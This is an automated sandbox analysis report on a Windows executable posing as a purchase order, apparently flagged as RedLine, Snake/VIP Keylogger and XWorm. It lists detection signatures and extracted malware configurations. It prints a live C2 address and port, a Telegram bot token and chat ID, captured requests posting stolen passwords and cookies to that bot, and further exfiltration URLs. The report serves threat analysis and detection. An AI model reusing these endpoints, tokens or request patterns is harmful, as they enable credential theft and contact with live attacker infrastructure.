Windows Analysis Report
BQ_PO#385995.exe

Overview

General Information

Sample name: BQ_PO#385995.exe
Analysis ID: 1569121
MD5: 7e3e88fad78dff83ea421084315bfd78
SHA1: 2e185874ff61f0097b34ae66cdc09bbbf1951f62
SHA256: 26c434592adaffa102b1cc61983fd9355dfa4fe0e06ad3acb50732892f67d466
Tags: exeuser-TeamDreier
Infos:

Detection

RedLine, Snake Keylogger, VIP Keylogger, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected BrowserPasswordDump
Yara detected RedLine Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
Yara detected VIP Keylogger
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Name Description Attribution Blogpost URLs Link
XWorm Malware with wide range of capabilities ranging from RAT to ransomware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Avira: detection malicious, Label: HEUR/AGEN.1307591
Found malware configuration
Source: 00000003.00000002.4593226321.00000000033C1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["69.174.100.131"], "Port": 7000, "Aes key": "<12345678190>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo", "Chat_id": "6236275763", "Version": "4.4"}
Source: 14.0.ubygsn.exe.980000.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo", "Chat id": "6236275763", "Version": "4.4"}
Source: ubygsn.exe.3700.14.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendMessage"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe ReversingLabs: Detection: 71%
Multi AV Scanner detection for submitted file
Source: BQ_PO#385995.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: BQ_PO#385995.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack String decryptor: 69.174.100.131
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack String decryptor: 7000
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack String decryptor: <12345678190>
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack String decryptor: <Xwormmm>
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack String decryptor: USB.exe

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BQ_PO#385995.exe PID: 2244, type: MEMORYSTR
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49765 version: TLS 1.0
Source: unknown HTTPS traffic detected: 20.190.177.147:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49947 version: TLS 1.2
Source: BQ_PO#385995.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WER2620.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb` source: WER2620.tmp.dmp.7.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256R source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Recovery\Recovery\obj\Debug\Recovery.pdb source: MSBuild.exe, 00000003.00000002.4606149598.000000000441A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2620.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2620.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WER2620.tmp.dmp.7.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0101F45Dh 14_2_0101F2C0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0101F45Dh 14_2_0101F4AC
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0101FC19h 14_2_0101F961
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 069831E8h 14_2_06982DD0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 06980D0Dh 14_2_06980B30
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 06981697h 14_2_06980B30
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 06982C21h 14_2_06982970
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698E959h 14_2_0698E6B0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698E0A9h 14_2_0698DE00
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698F209h 14_2_0698EF60
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698CF49h 14_2_0698CCA0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 069831E8h 14_2_06982DCA
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698D7F9h 14_2_0698D550
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698E501h 14_2_0698E258
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698F661h 14_2_0698F3B8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698EDB1h 14_2_0698EB08
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698D3A1h 14_2_0698D0F8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698FAB9h 14_2_0698F810
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06980040
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 0698DC51h 14_2_0698D9A8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 4x nop then jmp 069831E8h 14_2_06983116

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2859226 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.6:49734 -> 69.174.100.131:7000
Source: Network traffic Suricata IDS: 2859221 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49734 -> 69.174.100.131:7000
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 69.174.100.131:7000 -> 192.168.2.6:49734
Source: Network traffic Suricata IDS: 2859222 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 69.174.100.131:7000 -> 192.168.2.6:49734
Source: Network traffic Suricata IDS: 2859220 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49734 -> 69.174.100.131:7000
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 69.174.100.131
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49734 -> 69.174.100.131:7000
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:105270%0D%0ADate%20and%20Time:%2006/12/2024%20/%2010:34:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20105270%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1659e59db6a3Host: api.telegram.orgContent-Length: 584
Source: global traffic HTTP traffic detected: POST /bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd167d86b4a9a5Host: api.telegram.orgContent-Length: 1281
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49755 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49778 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49789 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49799 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49780 -> 104.21.67.152:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49771 -> 104.21.67.152:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49765 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: unknown TCP traffic detected without corresponding DNS query: 69.174.100.131
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:105270%0D%0ADate%20and%20Time:%2006/12/2024%20/%2010:34:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20105270%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: tse1.mm.bing.net
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1659e59db6a3Host: api.telegram.orgContent-Length: 584
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 05 Dec 2024 13:02:04 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: ubygsn.exe, 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, ubygsn.exe.3.dr String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: ubygsn.exe, 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe.3.dr String found in binary or memory: http://aborters.duckdns.org:8081
Source: ubygsn.exe, 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe.3.dr String found in binary or memory: http://anotherarmy.dns.army:8081
